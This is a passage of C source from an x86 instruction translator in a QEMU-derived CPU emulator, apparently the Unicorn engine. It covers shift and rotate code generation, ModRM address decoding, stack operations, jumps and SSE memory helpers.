mask); tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, tcg_ctx->cpu_cc_dst, 1); } else { tcg_gen_shri_tl(tcg_ctx, tcg_ctx->cpu_cc_src2, s->T0, mask); tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, s->T0, 1); } tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_cc_src2, tcg_ctx->cpu_cc_src2, 1); tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_cc_src2, tcg_ctx->cpu_cc_src2, tcg_ctx->cpu_cc_dst); set_cc_op(s, CC_OP_ADCOX); } } /* XXX: add faster immediate = 1 case */ static void gen_rotc_rm_T1(DisasContext *s, MemOp ot, int op1, int is_right) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_compute_eflags(s); // assert(s->cc_op == CC_OP_EFLAGS); /* load */ if (op1 == OR_TMP0) gen_op_ld_v(s, ot, s->T0, s->A0); else gen_op_mov_v_reg(s, ot, s->T0, op1); if (is_right) { switch (ot) { case MO_8: gen_helper_rcrb(tcg_ctx, s->T0, tcg_ctx->cpu_env, s->T0, s->T1); break; case MO_16: gen_helper_rcrw(tcg_ctx, s->T0, tcg_ctx->cpu_env, s->T0, s->T1); break; case MO_32: gen_helper_rcrl(tcg_ctx, s->T0, tcg_ctx->cpu_env, s->T0, s->T1); break; #ifdef TARGET_X86_64 case MO_64: gen_helper_rcrq(tcg_ctx, s->T0, tcg_ctx->cpu_env, s->T0, s->T1); break; #endif default: tcg_abort(); } } else { switch (ot) { case MO_8: gen_helper_rclb(tcg_ctx, s->T0, tcg_ctx->cpu_env, s->T0, s->T1); break; case MO_16: gen_helper_rclw(tcg_ctx, s->T0, tcg_ctx->cpu_env, s->T0, s->T1); break; case MO_32: gen_helper_rcll(tcg_ctx, s->T0, tcg_ctx->cpu_env, s->T0, s->T1); break; #ifdef TARGET_X86_64 case MO_64: gen_helper_rclq(tcg_ctx, s->T0, tcg_ctx->cpu_env, s->T0, s->T1); break; #endif default: tcg_abort(); } } /* store */ gen_op_st_rm_T0_A0(s, ot, op1); } /* XXX: add faster immediate case */ static void gen_shiftd_rm_T1(DisasContext *s, MemOp ot, int op1, bool is_right, TCGv count_in) { TCGContext *tcg_ctx = s->uc->tcg_ctx; target_ulong mask = (ot == MO_64 ? 63 : 31); TCGv count; /* load */ if (op1 == OR_TMP0) { gen_op_ld_v(s, ot, s->T0, s->A0); } else { gen_op_mov_v_reg(s, ot, s->T0, op1); } count = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, count, count_in, mask); switch (ot) { case MO_16: /* Note: we implement the Intel behaviour for shift count > 16. This means "shrdw C, B, A" shifts A:B:A >> C. Build the B:A portion by constructing it as a 32-bit value. */ if (is_right) { tcg_gen_deposit_tl(tcg_ctx, s->tmp0, s->T0, s->T1, 16, 16); tcg_gen_mov_tl(tcg_ctx, s->T1, s->T0); tcg_gen_mov_tl(tcg_ctx, s->T0, s->tmp0); } else { tcg_gen_deposit_tl(tcg_ctx, s->T1, s->T0, s->T1, 16, 16); } /* FALLTHRU */ #ifdef TARGET_X86_64 case MO_32: /* Concatenate the two 32-bit values and use a 64-bit shift. */ tcg_gen_subi_tl(tcg_ctx, s->tmp0, count, 1); if (is_right) { tcg_gen_concat_tl_i64(tcg_ctx, s->T0, s->T0, s->T1); tcg_gen_shr_i64(tcg_ctx, s->tmp0, s->T0, s->tmp0); tcg_gen_shr_i64(tcg_ctx, s->T0, s->T0, count); } else { tcg_gen_concat_tl_i64(tcg_ctx, s->T0, s->T1, s->T0); tcg_gen_shl_i64(tcg_ctx, s->tmp0, s->T0, s->tmp0); tcg_gen_shl_i64(tcg_ctx, s->T0, s->T0, count); tcg_gen_shri_i64(tcg_ctx, s->tmp0, s->tmp0, 32); tcg_gen_shri_i64(tcg_ctx, s->T0, s->T0, 32); } break; #endif default: tcg_gen_subi_tl(tcg_ctx, s->tmp0, count, 1); if (is_right) { tcg_gen_shr_tl(tcg_ctx, s->tmp0, s->T0, s->tmp0); tcg_gen_subfi_tl(tcg_ctx, s->tmp4, mask + 1, count); tcg_gen_shr_tl(tcg_ctx, s->T0, s->T0, count); tcg_gen_shl_tl(tcg_ctx, s->T1, s->T1, s->tmp4); } else { tcg_gen_shl_tl(tcg_ctx, s->tmp0, s->T0, s->tmp0); if (ot == MO_16) { /* Only needed if count > 16, for Intel behaviour. */ tcg_gen_subfi_tl(tcg_ctx, s->tmp4, 33, count); tcg_gen_shr_tl(tcg_ctx, s->tmp4, s->T1, s->tmp4); tcg_gen_or_tl(tcg_ctx, s->tmp0, s->tmp0, s->tmp4); } tcg_gen_subfi_tl(tcg_ctx, s->tmp4, mask + 1, count); tcg_gen_shl_tl(tcg_ctx, s->T0, s->T0, count); tcg_gen_shr_tl(tcg_ctx, s->T1, s->T1, s->tmp4); } tcg_gen_movi_tl(tcg_ctx, s->tmp4, 0); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, s->T1, count, s->tmp4, s->tmp4, s->T1); tcg_gen_or_tl(tcg_ctx, s->T0, s->T0, s->T1); break; } /* store */ gen_op_st_rm_T0_A0(s, ot, op1); gen_shift_flags(s, ot, s->T0, s->tmp0, count, is_right); tcg_temp_free(tcg_ctx, count); } static void gen_shift(DisasContext *s1, int op, MemOp ot, int d, int s) { if (s != OR_TMP1) gen_op_mov_v_reg(s1, ot, s1->T1, s); switch(op) { case OP_ROL: gen_rot_rm_T1(s1, ot, d, 0); break; case OP_ROR: gen_rot_rm_T1(s1, ot, d, 1); break; case OP_SHL: case OP_SHL1: gen_shift_rm_T1(s1, ot, d, 0, 0); break; case OP_SHR: gen_shift_rm_T1(s1, ot, d, 1, 0); break; case OP_SAR: gen_shift_rm_T1(s1, ot, d, 1, 1); break; case OP_RCL: gen_rotc_rm_T1(s1, ot, d, 0); break; case OP_RCR: gen_rotc_rm_T1(s1, ot, d, 1); break; } } static void gen_shifti(DisasContext *s1, int op, MemOp ot, int d, int c) { TCGContext *tcg_ctx = s1->uc->tcg_ctx; switch(op) { case OP_ROL: gen_rot_rm_im(s1, ot, d, c, 0); break; case OP_ROR: gen_rot_rm_im(s1, ot, d, c, 1); break; case OP_SHL: case OP_SHL1: gen_shift_rm_im(s1, ot, d, c, 0, 0); break; case OP_SHR: gen_shift_rm_im(s1, ot, d, c, 1, 0); break; case OP_SAR: gen_shift_rm_im(s1, ot, d, c, 1, 1); break; default: /* currently not optimized */ tcg_gen_movi_tl(tcg_ctx, s1->T1, c); gen_shift(s1, op, ot, d, OR_TMP1); break; } } #define X86_MAX_INSN_LENGTH 15 static uint64_t advance_pc(CPUX86State *env, DisasContext *s, int num_bytes) { uint64_t pc = s->pc; s->pc += num_bytes; if (unlikely(s->pc - s->pc_start > X86_MAX_INSN_LENGTH)) { /* If the instruction's 16th byte is on a different page than the 1st, a * page fault on the second page wins over the general protection fault * caused by the instruction being too long. * This can happen even if the operand is only one byte long! */ if (((s->pc - 1) ^ (pc - 1)) & TARGET_PAGE_MASK) { volatile uint8_t unused = cpu_ldub_code(env, (s->pc - 1) & TARGET_PAGE_MASK); (void) unused; } siglongjmp(s->jmpbuf, 1); } return pc; } static inline uint8_t x86_ldub_code(CPUX86State *env, DisasContext *s) { return translator_ldub(env->uc->tcg_ctx, env, advance_pc(env, s, 1)); } static inline int16_t x86_ldsw_code(CPUX86State *env, DisasContext *s) { return translator_ldsw(env->uc->tcg_ctx, env, advance_pc(env, s, 2)); } static inline uint16_t x86_lduw_code(CPUX86State *env, DisasContext *s) { return translator_lduw(env->uc->tcg_ctx, env, advance_pc(env, s, 2)); } static inline uint32_t x86_ldl_code(CPUX86State *env, DisasContext *s) { return translator_ldl(env->uc->tcg_ctx, env, advance_pc(env, s, 4)); } #ifdef TARGET_X86_64 static inline uint64_t x86_ldq_code(CPUX86State *env, DisasContext *s) { return translator_ldq(env->uc->tcg_ctx, env, advance_pc(env, s, 8)); } #endif /* Decompose an address. */ typedef struct AddressParts { int def_seg; int base; int index; int scale; target_long disp; } AddressParts; static AddressParts gen_lea_modrm_0(CPUX86State *env, DisasContext *s, int modrm) { int def_seg, base, index, scale, mod, rm; target_long disp; bool havesib; def_seg = R_DS; index = -1; scale = 0; disp = 0; mod = (modrm >> 6) & 3; rm = modrm & 7; base = rm | REX_B(s); if (mod == 3) { /* Normally filtered out earlier, but including this path simplifies multi-byte nop, as well as bndcl, bndcu, bndcn. */ goto done; } switch (s->aflag) { case MO_64: case MO_32: havesib = 0; if (rm == 4) { int code = x86_ldub_code(env, s); scale = (code >> 6) & 3; index = ((code >> 3) & 7) | REX_X(s); if (index == 4) { index = -1; /* no index */ } base = (code & 7) | REX_B(s); havesib = 1; } switch (mod) { case 0: if ((base & 7) == 5) { base = -1; disp = (int32_t)x86_ldl_code(env, s); if (CODE64(s) && !havesib) { base = -2; disp += s->pc + s->rip_offset; } } break; case 1: disp = (int8_t)x86_ldub_code(env, s); break; default: case 2: disp = (int32_t)x86_ldl_code(env, s); break; } /* For correct popl handling with esp. */ if (base == R_ESP && s->popl_esp_hack) { disp += s->popl_esp_hack; } if (base == R_EBP || base == R_ESP) { def_seg = R_SS; } break; case MO_16: if (mod == 0) { if (rm == 6) { base = -1; disp = x86_lduw_code(env, s); break; } } else if (mod == 1) { disp = (int8_t)x86_ldub_code(env, s); } else { disp = (int16_t)x86_lduw_code(env, s); } switch (rm) { case 0: base = R_EBX; index = R_ESI; break; case 1: base = R_EBX; index = R_EDI; break; case 2: base = R_EBP; index = R_ESI; def_seg = R_SS; break; case 3: base = R_EBP; index = R_EDI; def_seg = R_SS; break; case 4: base = R_ESI; break; case 5: base = R_EDI; break; case 6: base = R_EBP; def_seg = R_SS; break; default: case 7: base = R_EBX; break; } break; default: tcg_abort(); } done: return (AddressParts){ def_seg, base, index, scale, disp }; } /* Compute the address, with a minimum number of TCG ops. */ static TCGv gen_lea_modrm_1(DisasContext *s, AddressParts a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv ea = NULL; if (a.index >= 0) { if (a.scale == 0) { ea = tcg_ctx->cpu_regs[a.index]; } else { tcg_gen_shli_tl(tcg_ctx, s->A0, tcg_ctx->cpu_regs[a.index], a.scale); ea = s->A0; } if (a.base >= 0) { tcg_gen_add_tl(tcg_ctx, s->A0, ea, tcg_ctx->cpu_regs[a.base]); ea = s->A0; } } else if (a.base >= 0) { ea = tcg_ctx->cpu_regs[a.base]; } if (!ea) { tcg_gen_movi_tl(tcg_ctx, s->A0, a.disp); ea = s->A0; } else if (a.disp != 0) { tcg_gen_addi_tl(tcg_ctx, s->A0, ea, a.disp); ea = s->A0; } return ea; } static void gen_lea_modrm(CPUX86State *env, DisasContext *s, int modrm) { AddressParts a = gen_lea_modrm_0(env, s, modrm); TCGv ea = gen_lea_modrm_1(s, a); gen_lea_v_seg(s, s->aflag, ea, a.def_seg, s->override); } static void gen_nop_modrm(CPUX86State *env, DisasContext *s, int modrm) { (void)gen_lea_modrm_0(env, s, modrm); } /* Used for BNDCL, BNDCU, BNDCN. */ static void gen_bndck(CPUX86State *env, DisasContext *s, int modrm, TCGCond cond, TCGv_i64 bndv) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv ea = gen_lea_modrm_1(s, gen_lea_modrm_0(env, s, modrm)); tcg_gen_extu_tl_i64(tcg_ctx, s->tmp1_i64, ea); if (!CODE64(s)) { tcg_gen_ext32u_i64(tcg_ctx, s->tmp1_i64, s->tmp1_i64); } tcg_gen_setcond_i64(tcg_ctx, cond, s->tmp1_i64, s->tmp1_i64, bndv); tcg_gen_extrl_i64_i32(tcg_ctx, s->tmp2_i32, s->tmp1_i64); gen_helper_bndck(tcg_ctx, tcg_ctx->cpu_env, s->tmp2_i32); } /* used for LEA and MOV AX, mem */ static void gen_add_A0_ds_seg(DisasContext *s) { gen_lea_v_seg(s, s->aflag, s->A0, R_DS, s->override); } /* generate modrm memory load or store of 'reg'. TMP0 is used if reg == OR_TMP0 */ static void gen_ldst_modrm(CPUX86State *env, DisasContext *s, int modrm, MemOp ot, int reg, int is_store) { int mod, rm; mod = (modrm >> 6) & 3; rm = (modrm & 7) | REX_B(s); if (mod == 3) { if (is_store) { if (reg != OR_TMP0) gen_op_mov_v_reg(s, ot, s->T0, reg); gen_op_mov_reg_v(s, ot, rm, s->T0); } else { gen_op_mov_v_reg(s, ot, s->T0, rm); if (reg != OR_TMP0) gen_op_mov_reg_v(s, ot, reg, s->T0); } } else { gen_lea_modrm(env, s, modrm); if (is_store) { if (reg != OR_TMP0) gen_op_mov_v_reg(s, ot, s->T0, reg); gen_op_st_v(s, ot, s->T0, s->A0); } else { gen_op_ld_v(s, ot, s->T0, s->A0); if (reg != OR_TMP0) gen_op_mov_reg_v(s, ot, reg, s->T0); } } } static inline uint32_t insn_get(CPUX86State *env, DisasContext *s, MemOp ot) { uint32_t ret; switch (ot) { case MO_8: ret = x86_ldub_code(env, s); break; case MO_16: ret = x86_lduw_code(env, s); break; case MO_32: #ifdef TARGET_X86_64 case MO_64: #endif ret = x86_ldl_code(env, s); break; default: tcg_abort(); } return ret; } static inline int insn_const_size(MemOp ot) { if (ot <= MO_32) { return 1 << ot; } else { return 4; } } static inline bool use_goto_tb(DisasContext *s, target_ulong pc) { return (pc & TARGET_PAGE_MASK) == (s->base.tb->pc & TARGET_PAGE_MASK) || (pc & TARGET_PAGE_MASK) == (s->pc_start & TARGET_PAGE_MASK); } static inline void gen_goto_tb(DisasContext *s, int tb_num, target_ulong eip) { TCGContext *tcg_ctx = s->uc->tcg_ctx; target_ulong pc = s->cs_base + eip; if (use_goto_tb(s, pc)) { /* jump to same page: we can use a direct jump */ tcg_gen_goto_tb(tcg_ctx, tb_num); gen_jmp_im(s, eip); tcg_gen_exit_tb(tcg_ctx, s->base.tb, tb_num); s->base.is_jmp = DISAS_NORETURN; } else { /* jump to another page */ gen_jmp_im(s, eip); gen_jr(s, s->tmp0); } } static inline void gen_jcc(DisasContext *s, int b, target_ulong val, target_ulong next_eip) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGLabel *l1, *l2; if (s->jmp_opt) { l1 = gen_new_label(tcg_ctx); gen_jcc1(s, b, l1); gen_goto_tb(s, 0, next_eip); gen_set_label(tcg_ctx, l1); gen_goto_tb(s, 1, val); } else { l1 = gen_new_label(tcg_ctx); l2 = gen_new_label(tcg_ctx); gen_jcc1(s, b, l1); gen_jmp_im(s, next_eip); tcg_gen_br(tcg_ctx, l2); gen_set_label(tcg_ctx, l1); gen_jmp_im(s, val); gen_set_label(tcg_ctx, l2); gen_eob(s); } } static void gen_cmovcc1(CPUX86State *env, DisasContext *s, MemOp ot, int b, int modrm, int reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; CCPrepare cc; gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); cc = gen_prepare_cc(s, b, s->T1); if (cc.mask != -1) { TCGv t0 = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, t0, cc.reg, cc.mask); cc.reg = t0; } if (!cc.use_reg2) { cc.reg2 = tcg_const_tl(tcg_ctx, cc.imm); } tcg_gen_movcond_tl(tcg_ctx, cc.cond, s->T0, cc.reg, cc.reg2, s->T0, tcg_ctx->cpu_regs[reg]); gen_op_mov_reg_v(s, ot, reg, s->T0); if (cc.mask != -1) { tcg_temp_free(tcg_ctx, cc.reg); } if (!cc.use_reg2) { tcg_temp_free(tcg_ctx, cc.reg2); } } static inline void gen_op_movl_T0_seg(DisasContext *s, int seg_reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_ld32u_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State,segs[seg_reg].selector)); } static inline void gen_op_movl_seg_T0_vm(DisasContext *s, int seg_reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_ext16u_tl(tcg_ctx, s->T0, s->T0); tcg_gen_st32_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State,segs[seg_reg].selector)); tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_seg_base[seg_reg], s->T0, 4); } /* move T0 to seg_reg and compute if the CPU state may change. Never call this function with seg_reg == R_CS */ static void gen_movl_seg_T0(DisasContext *s, int seg_reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (s->pe && !s->vm86) { tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp2_i32, s->T0); gen_helper_load_seg(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, seg_reg), s->tmp2_i32); /* abort translation because the addseg value may change or because ss32 may change. For R_SS, translation must always stop as a special handling must be done to disable hardware interrupts for the next instruction */ if (seg_reg == R_SS || (s->code32 && seg_reg < R_FS)) { s->base.is_jmp = DISAS_TOO_MANY; } } else { gen_op_movl_seg_T0_vm(s, seg_reg); if (seg_reg == R_SS) { s->base.is_jmp = DISAS_TOO_MANY; } } } static inline int svm_is_rep(int prefixes) { return ((prefixes & (PREFIX_REPZ | PREFIX_REPNZ)) ? 8 : 0); } static inline void gen_svm_check_intercept_param(DisasContext *s, target_ulong pc_start, uint32_t type, uint64_t param) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* no SVM activated; fast case */ if (likely(!(s->flags & HF_GUEST_MASK))) return; gen_update_cc_op(s); gen_jmp_im(s, pc_start - s->cs_base); gen_helper_svm_check_intercept_param(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, type), tcg_const_i64(tcg_ctx, param)); } static inline void gen_svm_check_intercept(DisasContext *s, target_ulong pc_start, uint64_t type) { gen_svm_check_intercept_param(s, pc_start, type, 0); } static inline void gen_stack_update(DisasContext *s, int addend) { gen_op_add_reg_im(s, mo_stacksize(s), R_ESP, addend); } /* Generate a push. It depends on ss32, addseg and dflag. */ static void gen_push_v(DisasContext *s, TCGv val) { TCGContext *tcg_ctx = s->uc->tcg_ctx; MemOp d_ot = mo_pushpop(s, s->dflag); MemOp a_ot = mo_stacksize(s); int size = 1 << d_ot; TCGv new_esp = s->A0; tcg_gen_subi_tl(tcg_ctx, s->A0, tcg_ctx->cpu_regs[R_ESP], size); if (!CODE64(s)) { if (s->addseg) { new_esp = s->tmp4; tcg_gen_mov_tl(tcg_ctx, new_esp, s->A0); } gen_lea_v_seg(s, a_ot, s->A0, R_SS, -1); } gen_op_st_v(s, d_ot, val, s->A0); gen_op_mov_reg_v(s, a_ot, R_ESP, new_esp); } /* two step pop is necessary for precise exceptions */ static MemOp gen_pop_T0(DisasContext *s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; MemOp d_ot = mo_pushpop(s, s->dflag); gen_lea_v_seg(s, mo_stacksize(s), tcg_ctx->cpu_regs[R_ESP], R_SS, -1); gen_op_ld_v(s, d_ot, s->T0, s->A0); return d_ot; } static inline void gen_pop_update(DisasContext *s, MemOp ot) { gen_stack_update(s, 1 << ot); } static inline void gen_stack_A0(DisasContext *s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_lea_v_seg(s, s->ss32 ? MO_32 : MO_16, tcg_ctx->cpu_regs[R_ESP], R_SS, -1); } static void gen_pusha(DisasContext *s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; MemOp s_ot = s->ss32 ? MO_32 : MO_16; MemOp d_ot = s->dflag; int size = 1 << d_ot; int i; for (i = 0; i < 8; i++) { tcg_gen_addi_tl(tcg_ctx, s->A0, tcg_ctx->cpu_regs[R_ESP], (i - 8) * size); gen_lea_v_seg(s, s_ot, s->A0, R_SS, -1); gen_op_st_v(s, d_ot, tcg_ctx->cpu_regs[7 - i], s->A0); } gen_stack_update(s, -8 * size); } static void gen_popa(DisasContext *s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; MemOp s_ot = s->ss32 ? MO_32 : MO_16; MemOp d_ot = s->dflag; int size = 1 << d_ot; int i; for (i = 0; i < 8; i++) { /* ESP is not reloaded */ if (7 - i == R_ESP) { continue; } tcg_gen_addi_tl(tcg_ctx, s->A0, tcg_ctx->cpu_regs[R_ESP], i * size); gen_lea_v_seg(s, s_ot, s->A0, R_SS, -1); gen_op_ld_v(s, d_ot, s->T0, s->A0); gen_op_mov_reg_v(s, d_ot, 7 - i, s->T0); } gen_stack_update(s, 8 * size); } static void gen_enter(DisasContext *s, int esp_addend, int level) { TCGContext *tcg_ctx = s->uc->tcg_ctx; MemOp d_ot = mo_pushpop(s, s->dflag); MemOp a_ot = CODE64(s) ? MO_64 : s->ss32 ? MO_32 : MO_16; int size = 1 << d_ot; /* Push BP; compute FrameTemp into T1. */ tcg_gen_subi_tl(tcg_ctx, s->T1, tcg_ctx->cpu_regs[R_ESP], size); gen_lea_v_seg(s, a_ot, s->T1, R_SS, -1); gen_op_st_v(s, d_ot, tcg_ctx->cpu_regs[R_EBP], s->A0); level &= 31; if (level != 0) { int i; /* Copy level-1 pointers from the previous frame. */ for (i = 1; i < level; ++i) { tcg_gen_subi_tl(tcg_ctx, s->A0, tcg_ctx->cpu_regs[R_EBP], size * i); gen_lea_v_seg(s, a_ot, s->A0, R_SS, -1); gen_op_ld_v(s, d_ot, s->tmp0, s->A0); tcg_gen_subi_tl(tcg_ctx, s->A0, s->T1, size * i); gen_lea_v_seg(s, a_ot, s->A0, R_SS, -1); gen_op_st_v(s, d_ot, s->tmp0, s->A0); } /* Push the current FrameTemp as the last level. */ tcg_gen_subi_tl(tcg_ctx, s->A0, s->T1, size * level); gen_lea_v_seg(s, a_ot, s->A0, R_SS, -1); gen_op_st_v(s, d_ot, s->T1, s->A0); } /* Copy the FrameTemp value to EBP. */ gen_op_mov_reg_v(s, a_ot, R_EBP, s->T1); /* Compute the final value of ESP. */ tcg_gen_subi_tl(tcg_ctx, s->T1, s->T1, esp_addend + size * level); gen_op_mov_reg_v(s, a_ot, R_ESP, s->T1); } static void gen_leave(DisasContext *s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; MemOp d_ot = mo_pushpop(s, s->dflag); MemOp a_ot = mo_stacksize(s); gen_lea_v_seg(s, a_ot, tcg_ctx->cpu_regs[R_EBP], R_SS, -1); gen_op_ld_v(s, d_ot, s->T0, s->A0); tcg_gen_addi_tl(tcg_ctx, s->T1, tcg_ctx->cpu_regs[R_EBP], 1ULL << d_ot); gen_op_mov_reg_v(s, d_ot, R_EBP, s->T0); gen_op_mov_reg_v(s, a_ot, R_ESP, s->T1); } /* Similarly, except that the assumption here is that we don't decode the instruction at all -- either a missing opcode, an unimplemented feature, or just a bogus instruction stream. */ static void gen_unknown_opcode(CPUX86State *env, DisasContext *s) { gen_illegal_opcode(s); } /* an interrupt is different from an exception because of the privilege checks */ static void gen_interrupt(DisasContext *s, int intno, target_ulong cur_eip, target_ulong next_eip) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_update_cc_op(s); gen_jmp_im(s, cur_eip); gen_helper_raise_interrupt(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, intno), tcg_const_i32(tcg_ctx, next_eip - cur_eip)); s->base.is_jmp = DISAS_NORETURN; } static void gen_debug(DisasContext *s, target_ulong cur_eip) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_update_cc_op(s); gen_jmp_im(s, cur_eip); gen_helper_debug(tcg_ctx, tcg_ctx->cpu_env); s->base.is_jmp = DISAS_NORETURN; } static void gen_set_hflag(DisasContext *s, uint32_t mask) { if ((s->flags & mask) == 0) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 t = tcg_temp_new_i32(tcg_ctx); tcg_gen_ld_i32(tcg_ctx, t, tcg_ctx->cpu_env, offsetof(CPUX86State, hflags)); tcg_gen_ori_i32(tcg_ctx, t, t, mask); tcg_gen_st_i32(tcg_ctx, t, tcg_ctx->cpu_env, offsetof(CPUX86State, hflags)); tcg_temp_free_i32(tcg_ctx, t); s->flags |= mask; } } static void gen_reset_hflag(DisasContext *s, uint32_t mask) { if (s->flags & mask) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 t = tcg_temp_new_i32(tcg_ctx); tcg_gen_ld_i32(tcg_ctx, t, tcg_ctx->cpu_env, offsetof(CPUX86State, hflags)); tcg_gen_andi_i32(tcg_ctx, t, t, ~mask); tcg_gen_st_i32(tcg_ctx, t, tcg_ctx->cpu_env, offsetof(CPUX86State, hflags)); tcg_temp_free_i32(tcg_ctx, t); s->flags &= ~mask; } } /* Clear BND registers during legacy branches. */ static void gen_bnd_jmp(DisasContext *s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* Clear the registers only if BND prefix is missing, MPX is enabled, and if the BNDREGs are known to be in use (non-zero) already. The helper itself will check BNDPRESERVE at runtime. */ if ((s->prefix & PREFIX_REPNZ) == 0 && (s->flags & HF_MPX_EN_MASK) != 0 && (s->flags & HF_MPX_IU_MASK) != 0) { gen_helper_bnd_jmp(tcg_ctx, tcg_ctx->cpu_env); } } /* Generate an end of block. Trace exception is also generated if needed. If INHIBIT, set HF_INHIBIT_IRQ_MASK if it isn't already set. If RECHECK_TF, emit a rechecking helper for #DB, ignoring the state of S->TF. This is used by the syscall/sysret insns. */ static void do_gen_eob_worker(DisasContext *s, bool inhibit, bool recheck_tf, bool jr) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_update_cc_op(s); /* If several instructions disable interrupts, only the first does it. */ if (inhibit && !(s->flags & HF_INHIBIT_IRQ_MASK)) { gen_set_hflag(s, HF_INHIBIT_IRQ_MASK); } else { gen_reset_hflag(s, HF_INHIBIT_IRQ_MASK); } if (s->base.tb->flags & HF_RF_MASK) { gen_helper_reset_rf(tcg_ctx, tcg_ctx->cpu_env); } if (s->base.singlestep_enabled) { gen_helper_debug(tcg_ctx, tcg_ctx->cpu_env); } else if (recheck_tf) { gen_helper_rechecking_single_step(tcg_ctx, tcg_ctx->cpu_env); tcg_gen_exit_tb(tcg_ctx, NULL, 0); } else if (s->tf) { gen_helper_single_step(tcg_ctx, tcg_ctx->cpu_env); } else if (jr) { tcg_gen_lookup_and_goto_ptr(tcg_ctx); } else { tcg_gen_exit_tb(tcg_ctx, NULL, 0); } s->base.is_jmp = DISAS_NORETURN; } static inline void gen_eob_worker(DisasContext *s, bool inhibit, bool recheck_tf) { do_gen_eob_worker(s, inhibit, recheck_tf, false); } /* End of block. If INHIBIT, set HF_INHIBIT_IRQ_MASK if it isn't already set. */ static void gen_eob_inhibit_irq(DisasContext *s, bool inhibit) { gen_eob_worker(s, inhibit, false); } /* End of block, resetting the inhibit irq flag. */ static void gen_eob(DisasContext *s) { gen_eob_worker(s, false, false); } /* Jump to register */ static void gen_jr(DisasContext *s, TCGv dest) { do_gen_eob_worker(s, false, false, true); } /* generate a jump to eip. No segment change must happen before as a direct call to the next block may occur */ static void gen_jmp_tb(DisasContext *s, target_ulong eip, int tb_num) { gen_update_cc_op(s); set_cc_op(s, CC_OP_DYNAMIC); if (s->jmp_opt) { gen_goto_tb(s, tb_num, eip); } else { gen_jmp_im(s, eip); gen_eob(s); } } static void gen_jmp(DisasContext *s, target_ulong eip) { gen_jmp_tb(s, eip, 0); } static inline void gen_ldq_env_A0(DisasContext *s, int offset) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_qemu_ld_i64(tcg_ctx, s->tmp1_i64, s->A0, s->mem_index, MO_LEQ); tcg_gen_st_i64(tcg_ctx, s->tmp1_i64, tcg_ctx->cpu_env, offset); } static inline void gen_stq_env_A0(DisasContext *s, int offset) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_ld_i64(tcg_ctx, s->tmp1_i64, tcg_ctx->cpu_env, offset); tcg_gen_qemu_st_i64(tcg_ctx, s->tmp1_i64, s->A0, s->mem_index, MO_LEQ); } static inline void gen_ldo_env_A0(DisasContext *s, int offset) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int mem_index = s->mem_index; tcg_gen_qemu_ld_i64(tcg_ctx, s->tmp1_i64, s->A0, mem_index, MO_LEQ); tcg_gen_st_i64(tcg_ctx, s->tmp1_i64, tcg_ctx->cpu_env, offset + offsetof(ZMMReg, ZMM_Q(0))); tcg_gen_addi_tl(tcg_ctx, s->tmp0, s->A0, 8); tcg_gen_qemu_ld_i64(tcg_ctx, s->tmp1_i64, s->tmp0, mem_index, MO_LEQ); tcg_gen_st_i64(tcg_ctx, s->tmp1_i64, tcg_ctx->cpu_env, offset + offsetof(ZMMReg, ZMM_Q(1))); } static inline void gen_sto_env_A0(DisasContext *s, int offset) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int mem_index = s->mem_index; tcg_gen_ld_i64(tcg_ctx, s->tmp1_i64, tcg_ctx->cpu_env, offset + offsetof(ZMMReg, ZMM_Q(0))); tcg_gen_qemu_st_i64(tcg_ctx, s->tmp1_i64, s->A0, mem_index, MO_LEQ); tcg_gen_addi_tl(tcg_ctx, s->tmp0, s->A0, 8); tcg_gen_ld_i64(tcg_ctx, s->tmp1_i64, tcg_ctx->cpu_env, offset + offsetof(ZMMReg, ZMM_Q(1))); tcg_gen_qemu_st_i64(tcg_ctx, s->tmp1_i64, s->tmp0, mem_index, MO_LEQ); } static inline void gen_op_movo(DisasContext *s, int d_offset, int s_offset) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_ld_i64(tcg_ctx, s->tmp1_i64, tcg_ctx->cpu_env, s_offset + offsetof(ZMMReg, ZMM_Q(0))); tcg_gen_st_i64(tcg_ctx, s->tmp1_i64, tcg_ctx->cpu_env, d_offset + offsetof(ZMMReg, ZMM_Q(0))); tcg_gen_ld_i64(tcg_ctx, s->tmp1_i64, tcg_ctx->cpu_env, s_offset + offsetof(ZMMReg, ZMM_Q(1))); 